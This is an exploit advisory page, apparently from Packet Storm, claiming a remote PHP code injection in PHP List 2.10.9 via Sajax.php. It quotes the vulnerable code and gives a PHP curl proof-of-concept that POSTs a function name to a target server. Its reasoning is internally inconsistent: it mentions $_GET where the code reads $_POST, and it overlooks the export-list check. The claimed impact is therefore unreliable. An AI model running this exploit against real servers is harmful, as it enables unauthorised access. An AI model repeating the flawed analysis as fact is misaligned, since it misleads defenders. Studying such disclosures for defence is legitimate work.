PHP List version 2.10.9 suffers from a remote PHP code injection vulnerability.
c0cd3d38f573e33e53f01d69feeb8194bc1884cbe78a7bafd51ad3ccfed51be8# --------------------------------------- #
# Author : L3b-r1'z
# Title : Php List 2.10.9 Remote PHP Code Injection
# Date : 5/25/2012
# Email : L3br1z@Gmail.com
# Site : Sec4Ever.com & Exploit4arab.com
# --------------------------------------- #
# This PoC was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.
# --------------------------------------- #
# 1) Bug
# 2) PoC
# --------------------------------------- #
# 2) Bug :
# An attacker might execute arbitrary PHP code with this vulnerability.
# User tainted data is embedded into a function that compiles
# PHP code on the run and #executes it thus allowing an attacker to inject
own PHP code that will be
# executed. This vulnerability can lead to full server compromise.
# Look To The File Named (Sajax.php) In Dir (admin/commonlib/lib) On Line
(63)
# 63. $func_name = $_POST["rs"];
# if (! empty($_POST["rsargs"]))
# $args = $_POST["rsargs"];
# else
# $args = array();
# }
#
# if (! in_array($func_name, $sajax_export_list))
# echo "-:$func_name not callable";
# else {
# echo "+:";
# 74. $result = call_user_func_array($func_name, $args);
# echo $result;
# }
# exit;
# }
# So We Have Variable Func Name With Post rs :)
# In Above Of Code We Have $_GET['rs']; So This Is An Attacker Wan't It.
# Look To Line (74).
# Call_User_Func_Array($func_name, $args);
# Attacker Can Inject In Get Paramater Or POST PHP Code.
# --------------------------------------- #
# 3) PoC :
# <?php
# $target = $argv[1];
# $ch = curl_init();
# curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
# curl_setopt($ch, CURLOPT_URL, "http://$target/Sajax.php");
# curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01;
Windows NT 5.0)");
# curl_setopt($ch, CURLOPT_POST, 1);
# curl_setopt($ch, CURLOPT_POSTFIELDS, "rs=whoami");
# curl_setopt($ch, CURLOPT_TIMEOUT, 3);
# curl_setopt($ch, CURLOPT_LOW_SPEED_LIMIT, 3);
# curl_setopt($ch, CURLOPT_LOW_SPEED_TIME, 3);
# curl_setopt($ch, CURLOPT_COOKIEJAR, "/tmp/cookie_$target");
# $buf = curl_exec ($ch);
# curl_close($ch);
# unset($ch);
# echo $buf;
# ?>
# --------------------------------------- #
# Thx To : I-Hmx , B0X , Hacker-1420 , Damane2011 , Sec4ever , The Injector
, Over-X , Ked-Ans.
# --------------------------------------- #
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed